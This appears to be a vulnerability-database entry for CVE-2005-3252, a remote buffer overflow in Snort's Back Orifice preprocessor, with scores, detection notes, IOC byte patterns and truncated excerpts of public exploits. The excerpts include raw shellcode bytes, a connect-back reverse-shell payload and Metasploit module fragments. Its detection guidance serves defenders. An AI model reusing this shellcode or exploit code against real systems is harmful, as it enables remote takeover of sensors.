CVE-2005-3252
published 2005-10-18CVE-2005-3252: Stack-based buffer overflow in the Back Orifice (BO) preprocessor for Snort before 2.4.3 allows remote attackers to execute arbitrary code via a crafted UDP…
PriorityP265high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
83.50%
99.6th percentile
Stack-based buffer overflow in the Back Orifice (BO) preprocessor for Snort before 2.4.3 allows remote attackers to execute arbitrary code via a crafted UDP packet.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sourcefire | snort | — | — |
| sourcefire | snort | — | — |
| sourcefire | snort | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
2a 21 2a 51 57 54 59 3f
bytes↗
*!*QWTY?
bytes↗
\xed\xac\xef\x0d
bytes↗
\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8\x8e\x30\x01\x83\xeb\xfc\xe2\xf4
bytes↗
\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x7a\x69\x66\x53
bytes↗
\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80
- →Exploit packets are XOR-encrypted using the BO key-stream (seed 0, PRNG: holdrand = holdrand * 214013 + 2531011). Detection should look for UDP packets starting with the encrypted form of '*!*QWTY?' with payload length exceeding 1024 bytes sent to Snort's listening port. ↗
- →The BO PING packet type byte is 0x01 (TYPE_PING). Exploit packets carry type=0x01 immediately after the 8-byte magic and 8-byte length+ID fields. ↗
- →Exploit UDP packets are typically ~1400 bytes (PACKETSIZE 1400) or ~1069-1096 bytes depending on the exploit variant. Oversized UDP datagrams to Snort's BO preprocessor port matching the BO magic header are a strong indicator. ↗
- →The default exploit target port used by multiple public exploits is UDP/9080; a secondary variant uses UDP/9000. Monitor for large UDP packets to these ports containing the BO magic string. ↗
- →Snort versions 2.4.0 through 2.4.2 are confirmed vulnerable; 2.4.3 is the patched version. Identify unpatched Snort instances in the environment. ↗
- ·The exploit XOR-encrypts the entire BO packet (including the magic header) using a deterministic PRNG seeded at 0 with an empty password (key=31337). A simple plaintext string match for '*!*QWTY?' in UDP payload will NOT detect the exploit traffic; detection must account for the encrypted form or trigger on packet size/structure anomalies. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Snort Back Orifice - Pre-Preprocessor Remote (Metasploit)
exploitdb·2010-07-03
CVE-2005-3252 Snort Back Orifice - Pre-Preprocessor Remote (Metasploit)
Snort Back Orifice - Pre-Preprocessor Remote (Metasploit)
---
##
# $Id: snortbopre.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in the Back Orifice pre-processor module
included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
be used to completely compromise a Snort sensor, and would typically gain an attacker
full root or administrative privileges.
},
'Au
Exploit-DB
Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (4)
exploitdb·2005-11-11
CVE-2005-3252 Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (4)
Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (4)
---
#!/usr/bin/ruby -w
#
#
# Version 0.1 (Public)
#
# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
#
# by xwings at mysec dot org
# URL : http://www.mysec.org , somebody need to update the page
#
# Saying Hi to ....
#
# . All the 1337 c0d3r @ pulltheplug.org
# . Gurus from #rubylang @ freenode.net
# . Skywizard @ somewhere right now
# . HITBSecConf CREW and Team Panda
#
# 03:07 hey xwings
# 03:07 why don't you come up and see me sometime?
#
# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 3.3.5 (Debian 1:3.3.5-13)
# Snort 2.4.2 , ./configure && make && make install
#
# Use Ruby : http://www.ruby-lang.org
#
#
#
require 'socket'
fathost = ARGV[0]
packetsize
Exploit-DB
Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (3)
exploitdb·2005-11-11
CVE-2005-3252 Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (3)
Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (3)
---
/*
* snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
*
* by Russell Sanford ([email protected])
* -> www.code-junkies.net
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define buffsize 1056
#define COOKIE "*!*QWTY?"
typedef struct {
char magic[8];
int len;
int id;
char type;
char data[buffsize];
char crc;
} BOHEADER;
char buffer[buffsize+5000];
static long holdrand = 31337L;
unsigned int ret_address = 0xbfffebad;
// 90 byte Connect Back shellcode. Connects Back to Port 21 to givin IP
char shellcode[] =
"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68"
"\x45\xc4\x34\x1e" // IP-A
"\x81\x04\x24"
"\x01\x01\x01\x01" // IP-B
"\x68\x01\xff\xfe\x13
Exploit-DB
Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow
exploitdb·2005-10-25
CVE-2005-3252 Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow
Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow
---
/*
* THCsnortbo 0.3 - Snort BackOrifice PING exploit
* by [email protected]
* THC PUBLIC SOURCE MATERIALS
*
* Bug was found by Internet Security Systems
* http://xforce.iss.net/xforce/alerts/id/207
*
* v0.3 - removed/cleaned up info for public release
* v0.2 - details added, minor changes
* v0.1 - first release
*
* Greetz to all guests at THC's 10th
* Anniversary (TAX) :>
*
* $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $
*
*/
/*
* DETAILS
*
* The bug is in spp_bo.c, BoGetDirection() function
* static int BoGetDirection(Packet *p, char *pkt_data) {
* u_int32_t len = 0;
* u_int32_t id = 0;
* u_int32_t l, i;
* char type;
* char buf1[1024];
*
* ...
* buf_ptr = buf1;
* ...
* while ( i buf1 size.
*
* The exchange of data betwee
Exploit-DB
Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote (Metasploit)
exploitdb·2005-10-18
CVE-2005-3252 Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote (Metasploit)
Snort 2.4.0 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
'Description' => %q{
This module exploits a stack overflow in the Back Orifice pre-processor module
included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
be used to completely compromise a Snort sensor, and would typically gain an attacker
full root or administrative privileges.
},
'Author' => 'KaiJern Lau ',
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2005-3252'],
['OSVDB', '20034'],
['BID', '15131'],
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
],
'Payload' =>
{
'Space' => 1073, #ret : 1069
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Debian 3.1 Sarge
[
'Debian 3.1 Sarge',
{
'Platform' => 'linux',
'Ret' => 0xbffff350
}
],
],
'DefaultTarget
Metasploit
Snort Back Orifice Pre-Preprocessor Buffer Overflow
metasploit
Snort Back Orifice Pre-Preprocessor Buffer Overflow
Snort Back Orifice Pre-Preprocessor Buffer Overflow
This module exploits a stack buffer overflow in the Back Orifice pre-processor module included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could be used to completely compromise a Snort sensor, and would typically gain an attacker full root or administrative privileges.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0505.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2005-11/0010.htmlhttp://secunia.com/advisories/17220http://secunia.com/advisories/17255http://secunia.com/advisories/17559http://securitytracker.com/id?1015070http://www.kb.cert.org/vuls/id/175500http://www.osvdb.org/20034http://www.securityfocus.com/bid/15131http://www.snort.org/docs/change_logs/2.4.3/Changelog.txthttp://www.us-cert.gov/cas/techalerts/TA05-291A.htmlhttp://www.vupen.com/english/advisories/2005/2138http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=362187&RenditionID=http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=363396&RenditionID=http://xforce.iss.net/xforce/alerts/id/207http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0505.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2005-11/0010.htmlhttp://secunia.com/advisories/17220http://secunia.com/advisories/17255http://secunia.com/advisories/17559http://securitytracker.com/id?1015070http://www.kb.cert.org/vuls/id/175500http://www.osvdb.org/20034http://www.securityfocus.com/bid/15131http://www.snort.org/docs/change_logs/2.4.3/Changelog.txthttp://www.us-cert.gov/cas/techalerts/TA05-291A.htmlhttp://www.vupen.com/english/advisories/2005/2138http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=362187&RenditionID=http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=363396&RenditionID=http://xforce.iss.net/xforce/alerts/id/207
2005-10-18
Published